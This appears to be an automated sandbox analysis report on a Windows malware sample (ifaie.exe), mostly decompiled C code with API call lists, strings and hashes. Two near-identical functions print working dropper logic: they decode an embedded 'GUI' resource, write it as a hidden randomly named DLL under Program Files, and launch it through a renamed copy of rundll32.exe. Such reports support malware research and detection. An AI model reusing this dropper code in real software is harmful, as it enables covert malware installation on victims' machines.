0x00413520
0x00413522
0x00413522
0x00413524
0x00413529
0x00000000
0x00000000
0x0041353b
0x0041353f
0x00413541
0x00413542
0x00413543
0x00413545
0x0041354b
0x00000000
0x00413522
0x004134ac
0x0041350f
0x00413515
0x00413515
0x00000000
0x0041350f
0x004134b1
0x004134fe
0x00413504
0x00413504
0x00000000
0x004134fe
0x004134b6
0x004134c8
0x004134c9
0x004134ca
0x004134cb
0x004134cd
0x004134d2
0x004134d6
0x004134dc
0x004134de
0x004134f0
0x004134f0
0x004134f2
0x00000000
0x004134b8
0x004134bb
0x004134c1
0x004134c1
0x00000000
0x004134bb

APIs

Part of subcall function 004133FE: _EH_prolog.MSVCRT ref: 00413403
Part of subcall function 004133FE: strlen.MSVCRT ref: 0041342B
Part of subcall function 004133FE: _CxxThrowException.MSVCRT(?,004196F8), ref: 0041345D

toupper.MSVCRT ref: 004134E9

Strings

z, xrefs: 004134E0
a, xrefs: 004134D9

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlentoupper
String ID: a$z
API String ID: 957254526-4151050625
Opcode ID: 8277708e309b7c437a6dfc9d7699ad9d0b7fa53085202667cbaf6d7db5bcf054
Instruction ID: b1aff326a2e06e5aad8b1cf850e00f7449f94b63455ed0c48128afb1fd7a013c
Opcode Fuzzy Hash: 8277708e309b7c437a6dfc9d7699ad9d0b7fa53085202667cbaf6d7db5bcf054
Instruction Fuzzy Hash: F341B6715451817EEB294E2884197FA3BDE9B17F0AF2C041FE4C587A92C66C4BC1C70E

Uniqueness

Uniqueness Score: -1.00%

Function 004023AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004023AE(intOrPtr __ecx) {
				void* _t22;
				char* _t23;
				void* _t25;
				void* _t28;

				L004153D0();
				 *((intOrPtr*)(_t28 - 0x10)) = __ecx;
				 *((char*)(__ecx + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 8))));
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x417664;
				_t23 = __ecx + 0x18;
				 *((intOrPtr*)(_t28 - 4)) = 0;
				 *_t23 =  *((intOrPtr*)(_t28 + 0xb));
				 *0x417230(0, _t22, _t25, __ecx);
				 *((intOrPtr*)(__ecx + 0x28)) = _t23;
				 *((intOrPtr*)(__ecx)) = 0x41766c;
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return __ecx;
			}

0x004023b3
0x004023c2
0x004023c5
0x004023ca
0x004023cd
0x004023d0
0x004023d3
0x004023dc
0x004023e0
0x004023e3
0x004023e7
0x004023f0
0x004023f3
0x004023fd
0x00402405

APIs

_EH_prolog.MSVCRT ref: 004023B3

Strings

v$@, xrefs: 004023F3
>$@, xrefs: 004023D3

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: H_prolog
String ID: >$@$v$@
API String ID: 3519838083-1508283045
Opcode ID: 197faed4f41ed2a95b5947a493da987ecdbf76c1af6f413e88e6733cf9929da4
Instruction ID: 2a2c642b6552ba3d24064c73d9aa280cfc44eb8d4c0d781014b5c2aac6b69bdf
Opcode Fuzzy Hash: 197faed4f41ed2a95b5947a493da987ecdbf76c1af6f413e88e6733cf9929da4
Instruction Fuzzy Hash: 84F032B1A04B819FC720CF6D84406DAFBF4AB99710B10896FE09AD3710D3B4A580CBA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ifaie.exePID: 5244, Parent PID: 5212COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	17%
Signature Coverage:	0%
Total number of Nodes:	88
Total number of Limit Nodes:	4

Executed Functions

Function 004013BC Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 306
filesleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E004013BC() {
				long _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				long _v24;
				void* _v39;
				void _v40;
				void* _v44;
				void* _v48;
				struct _STARTUPINFOA _v116;
				struct _PROCESS_INFORMATION _v132;
				char _v168;
				void _v427;
				char _v428;
				void _v687;
				char _v688;
				void _v947;
				char _v948;
				void _v1207;
				char _v1208;
				void _v1719;
				char _v1720;
				struct HRSRC__* _t105;
				int _t108;
				int _t124;
				void* _t136;
				signed int _t138;
				signed int _t139;
				void* _t177;
				signed int _t178;
				signed int _t193;
				signed int _t200;
				signed int _t201;
				signed int _t205;
				signed int _t209;
				signed int _t213;
				signed int _t214;
				signed int _t217;
				struct HRSRC__* _t218;
				signed int _t219;
				void* _t238;
				void* _t240;
				void* _t243;
				void* _t244;
				void* _t247;

				_t105 = FindResourceA(0, 0x82, "GUI"); // executed
				_t218 = _t105;
				if(_t218 == 0) {
					L2:
					return 0;
				}
				_t238 = LoadResource(0, _t218);
				if(_t238 != 0) {
					_t108 = SizeofResource(0, _t218);
					_v8 = _t108;
					memcpy(_t238, LockResource(_t238), _t108);
					_v16 =  *_t238 & 0x000000ff;
					_t244 = _t243 + 0xc;
					_t219 = 0;
					_v12 =  *(_t238 + 1) & 0x000000ff;
					if(_v8 <= 0) {
						L11:
						_t193 = 0x40;
						_v428 = 0;
						_push(0x40);
						memset( &_v427, 0, _t193 << 2);
						asm("stosw");
						asm("stosb");
						_v688 = 0;
						memset( &_v687, 0, 0 << 2);
						asm("stosw");
						asm("stosb");
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						E0040107C( &_v40, 5);
						wsprintfA( &_v428, "d:\\Program Files\\%s",  &_v40);
						_t247 = _t244 + 0x2c;
						_t124 = CreateDirectoryA( &_v428, 0); // executed
						if(_t124 == 0) {
							wsprintfA( &_v428, "c:\\Program Files\\%s",  &_v40);
							_t247 = _t247 + 0xc;
							CreateDirectoryA( &_v428, 0); // executed
						}
						Sleep(0x64); // executed
						SetFileAttributesA( &_v428, 2); // executed
						memset( &_v40, 0, 0x10);
						E0040107C( &_v40, 5);
						wsprintfA( &_v688, "%s\\%s.dll",  &_v428,  &_v40);
						_t136 = CreateFileA( &_v688, 0x40000000, 2, 0, 2, 0x80, 0); // executed
						_v44 = _t136;
						WriteFile(_t136, _t238, _v8,  &_v24, 0); // executed
						_t138 = rand();
						asm("cdq");
						_t139 = _t138 / 0xff;
						_t214 = _t138 % 0xff;
						_push(_t214);
						_v20 = _t214;
						L004151F6();
						_v48 = _t139;
						_t200 = _v20;
						if(_t200 <= 0) {
							L16:
							_t240 = _v44;
							WriteFile(_t240, _v48, _v20,  &_v24, 0); // executed
							SetFilePointer(_t240, 0, 0, 0); // executed
							WriteFile(_t240, "MZ", 2,  &_v24, 0); // executed
							FindCloseChangeNotification(_t240); // executed
							_t201 = 8;
							memcpy( &_v168, "c:\\windows\\system32\\rundll32.exe", _t201 << 2);
							asm("movsw");
							_push(0x40);
							_v948 = 0;
							memset( &_v947, 0, 0 << 2);
							asm("stosw");
							asm("stosb");
							memset( &_v40, 0, 0x10);
							E0040107C( &_v40, 3);
							wsprintfA( &_v948, "%s\\%s.exe",  &_v428,  &_v40);
							CopyFileA( &_v168,  &_v948, 0); // executed
							_t205 = 0x7f;
							_v1720 = 0;
							_push(0x40);
							memset( &_v1719, 0, _t205 << 2);
							asm("stosw");
							asm("stosb");
							_v1208 = 0;
							memset( &_v1207, 0, 0 << 2);
							asm("stosw");
							asm("stosb");
							GetModuleFileNameA(0,  &_v1208, 0x104);
							wsprintfA( &_v1720, "%s \"%s\",Hlink %s",  &_v948,  &_v688,  &_v1208);
							_t209 = 0x10;
							memset( &(_v116.lpReserved), 0, _t209 << 2);
							_v116.cb = 0x44;
							_v116.lpDesktop = "WinSta0\\Default";
							_v116.wShowWindow = 0;
							CreateProcessA(0,  &_v1720, 0, 0, 0, 0, 0, 0,  &_v116,  &_v132); // executed
							_t177 = 1;
							return _t177;
						} else {
							_v12 = 0xfa;
							_v8 = _t139;
							_v12 = _v12 - _t139;
							_v16 = _t200;
							do {
								_t178 = rand();
								asm("cdq");
								_v8 = _v8 + 1;
								_t67 =  &_v16;
								 *_t67 = _v16 - 1;
								 *_v8 = _t178 % (_v12 + _v8);
							} while ( *_t67 != 0);
							goto L16;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						asm("cdq");
						_t213 = 3;
						_t217 = _t219 % _t213;
						if(_t217 == 2) {
							 *((intOrPtr*)(_t238 + _t219)) =  *((intOrPtr*)(_t238 + _t219)) - _v16;
						}
						if(_t217 == 1) {
							 *((intOrPtr*)(_t238 + _t219)) =  *((intOrPtr*)(_t238 + _t219)) - _v12;
						}
						if(_t217 == 0) {
							 *((intOrPtr*)(_t238 + _t219)) =  *((intOrPtr*)(_t238 + _t219)) - _v12 + _v16;
						}
						_t219 = _t219 + 1;
					} while (_t219 < _v8);
					goto L11;
				}
				goto L2;
			}

0x004013d5
0x004013db
0x004013df
0x004013ef
0x00000000
0x004013ef
0x004013e9
0x004013ed
0x004013f8
0x00401400
0x0040140b
0x00401413
0x00401416
0x0040141d
0x00401422
0x00401425
0x00401458
0x0040145c
0x00401463
0x00401469
0x0040146b
0x0040146d
0x0040146f
0x00401479
0x0040147f
0x00401481
0x00401483
0x00401489
0x0040148e
0x0040148f
0x00401490
0x00401491
0x00401493
0x00401498
0x004014b3
0x004014b5
0x004014c0
0x004014c8
0x004014da
0x004014dc
0x004014e7
0x004014e7
0x004014ef
0x004014fe
0x0040150b
0x00401516
0x00401532
0x0040154e
0x00401562
0x00401567
0x0040156f
0x00401571
0x00401577
0x00401577
0x00401579
0x0040157a
0x0040157d
0x00401583
0x00401586
0x0040158b
0x004015b7
0x004015ba
0x004015c6
0x004015cc
0x004015df
0x004015e2
0x004015ef
0x004015f6
0x004015f8
0x004015fa
0x00401605
0x0040160d
0x0040160f
0x00401611
0x00401617
0x00401622
0x00401644
0x00401658
0x00401662
0x00401669
0x0040166f
0x00401671
0x00401673
0x00401675
0x0040167f
0x00401685
0x00401687
0x00401689
0x00401697
0x004016be
0x004016ca
0x004016cb
0x004016d0
0x004016ea
0x004016f1
0x004016f5
0x004016fd
0x00000000
0x0040158d
0x0040158d
0x00401594
0x00401597
0x0040159a
0x0040159d
0x0040159d
0x004015a7
0x004015ad
0x004015b0
0x004015b0
0x004015b3
0x004015b3
0x00000000
0x0040159d
0x00000000
0x00000000
0x00000000
0x00401427
0x00401427
0x0040142b
0x0040142c
0x0040142d
0x00401432
0x00401437
0x00401437
0x0040143d
0x00401442
0x00401442
0x00401447
0x0040144f
0x0040144f
0x00401452
0x00401453
0x00000000
0x00401427
0x00000000

APIs

FindResourceA.KERNEL32(00000000,00000082,GUI), ref: 004013D5
LoadResource.KERNEL32(00000000,00000000), ref: 004013E3
SizeofResource.KERNEL32(00000000,00000000), ref: 004013F8
LockResource.KERNEL32(00000000,00000000), ref: 00401403
memcpy.MSVCRT ref: 0040140B
wsprintfA.USER32 ref: 004014B3
CreateDirectoryA.KERNELBASE(?,00000000), ref: 004014C0
wsprintfA.USER32 ref: 004014DA
CreateDirectoryA.KERNELBASE(?,00000000), ref: 004014E7
Sleep.KERNELBASE(00000064), ref: 004014EF
SetFileAttributesA.KERNELBASE(?,00000002), ref: 004014FE
memset.MSVCRT ref: 0040150B

Part of subcall function 0040107C: GetTickCount.KERNEL32 ref: 00401095
Part of subcall function 0040107C: srand.MSVCRT ref: 0040109C
Part of subcall function 0040107C: rand.MSVCRT ref: 004010A9
Part of subcall function 0040107C: rand.MSVCRT ref: 004010C1

wsprintfA.USER32 ref: 00401532
CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040154E
WriteFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00401567
rand.MSVCRT ref: 0040156F
rand.MSVCRT ref: 0040159D
WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 004015C6
SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 004015CC
WriteFile.KERNELBASE(?,0041C0C8,00000002,?,00000000), ref: 004015DF
FindCloseChangeNotification.KERNELBASE(?), ref: 004015E2
memset.MSVCRT ref: 00401617
wsprintfA.USER32 ref: 00401644
CopyFileA.KERNEL32(?,?,00000000), ref: 00401658
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00401697
wsprintfA.USER32 ref: 004016BE
CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004016F5

Strings

WinSta0\Default, xrefs: 004016EA
c:\windows\system32\rundll32.exe, xrefs: 004015EA
D, xrefs: 004016D0
c:\Program Files\%s, xrefs: 004014D4
%s\%s.exe, xrefs: 0040163E
d:\Program Files\%s, xrefs: 004014AD
GUI, xrefs: 004013C8
%s\%s.dll, xrefs: 0040152C
%s "%s",Hlink %s, xrefs: 004016B8

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: File$wsprintf$CreateResourcerand$Write$DirectoryFindmemset$AttributesChangeCloseCopyCountLoadLockModuleNameNotificationPointerProcessSizeofSleepTickmemcpysrand
String ID: %s "%s",Hlink %s$%s\%s.dll$%s\%s.exe$D$GUI$WinSta0\Default$c:\Program Files\%s$c:\windows\system32\rundll32.exe$d:\Program Files\%s
API String ID: 2442594006-826311432
Opcode ID: 37b89522606a2c4a54853edb22f9fa52fe1b2d11cf8f40d47bde4dae3510350d
Instruction ID: ac8b8aeebc4711bad355f370068009a7f956b33eb2c00d030ca5656be22452af
Opcode Fuzzy Hash: 37b89522606a2c4a54853edb22f9fa52fe1b2d11cf8f40d47bde4dae3510350d
Instruction Fuzzy Hash: 5DA18DB2A4021CBFDB11DBA4CD85EDEBBBCAB48304F1044A6F245B7191DA749F848B65

Uniqueness

Uniqueness Score: -1.00%

Function 00415410 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00415410(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				char _v100;
				char _v104;
				int _v108;
				char _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t27;
				char _t29;
				intOrPtr* _t35;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				void* _t56;
				intOrPtr _t58;
				intOrPtr _t61;

				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				 *0x4172ec(2, __edi, __esi, __ebx,  *[fs:0x0], 0x415404, 0x419100, 0xffffffff, _t56);
				 *0x41cbe0 =  *0x41cbe0 | 0xffffffff;
				 *0x41cbe4 =  *0x41cbe4 | 0xffffffff;
				_t23 =  *0x4172f0();
				_t46 =  *0x41c9b8; // 0x0
				 *_t23 = _t46;
				_t24 =  *0x4172f4();
				_t47 =  *0x41c9b4; // 0x0
				 *_t24 = _t47;
				_t25 =  *0x4172fc; // 0x74896be4
				 *0x41cbdc =  *_t25;
				_t27 = E0041559B( *_t25);
				_t61 =  *0x41c8c8; // 0x1
				if(_t61 == 0) {
					_t27 =  *0x4172e4(E00415598);
				}
				E00415586(_t27);
				L00415580();
				_t29 =  *0x41c9b0; // 0x0
				_v112 = _t29;
				 *0x4172dc( &_v100,  &_v116,  &_v104,  *0x41c9ac,  &_v112, 0x41c028, 0x41c02c);
				_push(0x41c024);
				_push(0x41c000); // executed
				L00415580(); // executed
				_t35 =  *0x4172d8; // 0x74895b9c
				_t55 =  *_t35;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E004155C6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0041557A();
				return _t41;
			}

APIs

__set_app_type.MSVCRT ref: 0041543D
__p__fmode.MSVCRT ref: 00415452
__p__commode.MSVCRT ref: 00415460
__setusermatherr.MSVCRT ref: 0041548C
_initterm.MSVCRT ref: 004154A2
__getmainargs.MSVCRT ref: 004154C5
_initterm.MSVCRT ref: 004154D5
GetStartupInfoA.KERNEL32(?), ref: 00415514
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00415538
exit.MSVCRT ref: 00415548
_XcptFilter.MSVCRT ref: 0041555A

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: dc342064fc473dd6211d3b0943abf782a1a2789885f7a3c13764eacea4c338bf
Instruction ID: c74af80d35e2c67a5f516f5a1d0bf5d206878bc3e350f766078b7051b9745e2e
Opcode Fuzzy Hash: dc342064fc473dd6211d3b0943abf782a1a2789885f7a3c13764eacea4c338bf
Instruction Fuzzy Hash: 4141ACB1984744EFDB20DFA4DC85AEA7BBAEB48710F20416BF441972A1C7785881CB18

Uniqueness

Uniqueness Score: -1.00%

Function 004013B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E004013B9() {
				long _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				long _v24;
				void* _v39;
				void _v40;
				void* _v44;
				void* _v48;
				struct _STARTUPINFOA _v116;
				struct _PROCESS_INFORMATION _v132;
				char _v168;
				void _v427;
				char _v428;
				void _v687;
				char _v688;
				void _v947;
				char _v948;
				void _v1207;
				char _v1208;
				void _v1719;
				char _v1720;
				struct HRSRC__* _t105;
				int _t108;
				int _t124;
				void* _t136;
				signed int _t138;
				signed int _t139;
				signed int _t177;
				signed int _t194;
				signed int _t201;
				signed int _t202;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				struct HRSRC__* _t220;
				signed int _t222;
				void* _t243;
				void* _t245;
				void* _t251;
				void* _t252;
				void* _t254;
				void* _t257;

				_pop(_t219);
				_pop(_t241);
				_pop(_t191);
				_t252 = _t251 - 0x6b4;
				_t105 = FindResourceA(0, 0x82, "GUI"); // executed
				_t220 = _t105;
				if(_t220 != 0) {
					_t243 = LoadResource(0, _t220);
					if(_t243 != 0) {
						_t108 = SizeofResource(0, _t220);
						_v8 = _t108;
						memcpy(_t243, LockResource(_t243), _t108);
						_v16 =  *_t243 & 0x000000ff;
						_t254 = _t252 + 0xc;
						_t222 = 0;
						_v12 =  *(_t243 + 1) & 0x000000ff;
						if(_v8 > 0) {
							do {
								asm("cdq");
								_t214 = 3;
								_t218 = _t222 % _t214;
								if(_t218 == 2) {
									 *((intOrPtr*)(_t243 + _t222)) =  *((intOrPtr*)(_t243 + _t222)) - _v16;
								}
								if(_t218 == 1) {
									 *((intOrPtr*)(_t243 + _t222)) =  *((intOrPtr*)(_t243 + _t222)) - _v12;
								}
								if(_t218 == 0) {
									 *((intOrPtr*)(_t243 + _t222)) =  *((intOrPtr*)(_t243 + _t222)) - _v12 + _v16;
								}
								_t222 = _t222 + 1;
							} while (_t222 < _v8);
						}
						_t194 = 0x40;
						_v428 = 0;
						_push(0x40);
						memset( &_v427, 0, _t194 << 2);
						asm("stosw");
						asm("stosb");
						_v688 = 0;
						memset( &_v687, 0, 0 << 2);
						asm("stosw");
						asm("stosb");
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						E0040107C( &_v40, 5);
						wsprintfA( &_v428, "d:\\Program Files\\%s",  &_v40);
						_t257 = _t254 + 0x2c;
						_t124 = CreateDirectoryA( &_v428, 0); // executed
						if(_t124 == 0) {
							wsprintfA( &_v428, "c:\\Program Files\\%s",  &_v40);
							_t257 = _t257 + 0xc;
							CreateDirectoryA( &_v428, 0); // executed
						}
						Sleep(0x64); // executed
						SetFileAttributesA( &_v428, 2); // executed
						memset( &_v40, 0, 0x10);
						E0040107C( &_v40, 5);
						wsprintfA( &_v688, "%s\\%s.dll",  &_v428,  &_v40);
						_t136 = CreateFileA( &_v688, 0x40000000, 2, 0, 2, 0x80, 0); // executed
						_v44 = _t136;
						WriteFile(_t136, _t243, _v8,  &_v24, 0); // executed
						_t138 = rand();
						asm("cdq");
						_t139 = _t138 / 0xff;
						_t215 = _t138 % 0xff;
						_push(_t215);
						_v20 = _t215;
						L004151F6();
						_v48 = _t139;
						_t201 = _v20;
						if(_t201 > 0) {
							_v12 = 0xfa;
							_v8 = _t139;
							_v12 = _v12 - _t139;
							_v16 = _t201;
							do {
								_t177 = rand();
								asm("cdq");
								_v8 = _v8 + 1;
								_t67 =  &_v16;
								 *_t67 = _v16 - 1;
								 *_v8 = _t177 % (_v12 + _v8);
							} while ( *_t67 != 0);
						}
						_t245 = _v44;
						WriteFile(_t245, _v48, _v20,  &_v24, 0); // executed
						SetFilePointer(_t245, 0, 0, 0); // executed
						WriteFile(_t245, "MZ", 2,  &_v24, 0); // executed
						FindCloseChangeNotification(_t245); // executed
						_t202 = 8;
						memcpy( &_v168, "c:\\windows\\system32\\rundll32.exe", _t202 << 2);
						asm("movsw");
						_push(0x40);
						_v948 = 0;
						memset( &_v947, 0, 0 << 2);
						asm("stosw");
						asm("stosb");
						memset( &_v40, 0, 0x10);
						E0040107C( &_v40, 3);
						wsprintfA( &_v948, "%s\\%s.exe",  &_v428,  &_v40);
						CopyFileA( &_v168,  &_v948, 0); // executed
						_t206 = 0x7f;
						_v1720 = 0;
						_push(0x40);
						memset( &_v1719, 0, _t206 << 2);
						asm("stosw");
						asm("stosb");
						_v1208 = 0;
						memset( &_v1207, 0, 0 << 2);
						asm("stosw");
						asm("stosb");
						GetModuleFileNameA(0,  &_v1208, 0x104);
						wsprintfA( &_v1720, "%s \"%s\",Hlink %s",  &_v948,  &_v688,  &_v1208);
						_t210 = 0x10;
						memset( &(_v116.lpReserved), 0, _t210 << 2);
						_v116.cb = 0x44;
						_v116.lpDesktop = "WinSta0\\Default";
						_v116.wShowWindow = 0;
						CreateProcessA(0,  &_v1720, 0, 0, 0, 0, 0, 0,  &_v116,  &_v132); // executed
						_push(1);
						_pop(0);
					} else {
						goto L3;
					}
				}
				return 0;
			}

0x004013b9
0x004013ba
0x004013bb
0x004013bf
0x004013d5
0x004013db
0x004013df
0x004013e9
0x004013ed
0x004013f8
0x00401400
0x0040140b
0x00401413
0x00401416
0x0040141d
0x00401422
0x00401425
0x00401427
0x0040142b
0x0040142c
0x0040142d
0x00401432
0x00401437
0x00401437
0x0040143d
0x00401442
0x00401442
0x00401447
0x0040144f
0x0040144f
0x00401452
0x00401453
0x00401427
0x0040145c
0x00401463
0x00401469
0x0040146b
0x0040146d
0x0040146f
0x00401479
0x0040147f
0x00401481
0x00401483
0x00401489
0x0040148e
0x0040148f
0x00401490
0x00401491
0x00401493
0x00401498
0x004014b3
0x004014b5
0x004014c0
0x004014c8
0x004014da
0x004014dc
0x004014e7
0x004014e7
0x004014ef
0x004014fe
0x0040150b
0x00401516
0x00401532
0x0040154e
0x00401562
0x00401567
0x0040156f
0x00401571
0x00401577
0x00401577
0x00401579
0x0040157a
0x0040157d
0x00401583
0x00401586
0x0040158b
0x0040158d
0x00401594
0x00401597
0x0040159a
0x0040159d
0x0040159d
0x004015a7
0x004015ad
0x004015b0
0x004015b0
0x004015b3
0x004015b3
0x0040159d
0x004015ba
0x004015c6
0x004015cc
0x004015df
0x004015e2
0x004015ef
0x004015f6
0x004015f8
0x004015fa
0x00401605
0x0040160d
0x0040160f
0x00401611
0x00401617
0x00401622
0x00401644
0x00401658
0x00401662
0x00401669
0x0040166f
0x00401671
0x00401673
0x00401675
0x0040167f
0x00401685
0x00401687
0x00401689
0x00401697
0x004016be
0x004016ca
0x004016cb
0x004016d0
0x004016ea
0x004016f1
0x004016f5
0x004016fb
0x004016fd
0x00000000
0x00000000
0x00000000
0x004013ed
0x00401702

APIs

FindResourceA.KERNEL32(00000000,00000082,GUI), ref: 004013D5
LoadResource.KERNEL32(00000000,00000000), ref: 004013E3
SizeofResource.KERNEL32(00000000,00000000), ref: 004013F8
LockResource.KERNEL32(00000000,00000000), ref: 00401403
memcpy.MSVCRT ref: 0040140B
wsprintfA.USER32 ref: 004014B3
CreateDirectoryA.KERNELBASE(?,00000000), ref: 004014C0
wsprintfA.USER32 ref: 004014DA
CreateDirectoryA.KERNELBASE(?,00000000), ref: 004014E7
Sleep.KERNELBASE(00000064), ref: 004014EF
SetFileAttributesA.KERNELBASE(?,00000002), ref: 004014FE

Strings

GUI, xrefs: 004013C8

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: Resource$CreateDirectorywsprintf$AttributesFileFindLoadLockSizeofSleepmemcpy
String ID: GUI
API String ID: 3499318318-1113068146
Opcode ID: 2935683325844162e8379ffd8f7e88a60ce54dc87666410e4520308ef8b9b360
Instruction ID: 7681a7971a44aff1cfd63152e6ce6ab61ae4c3c5426a1299c50ffc8ee6258244
Opcode Fuzzy Hash: 2935683325844162e8379ffd8f7e88a60ce54dc87666410e4520308ef8b9b360
Instruction Fuzzy Hash: 07E086773443243BD22035BDACCDC973E9CC3C47A6B110837FA03E21D2A8794C4541A8

Uniqueness

Uniqueness Score: -1.00%

Function 004B5DAE Relevance: 5.2, APIs: 4, Instructions: 229
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

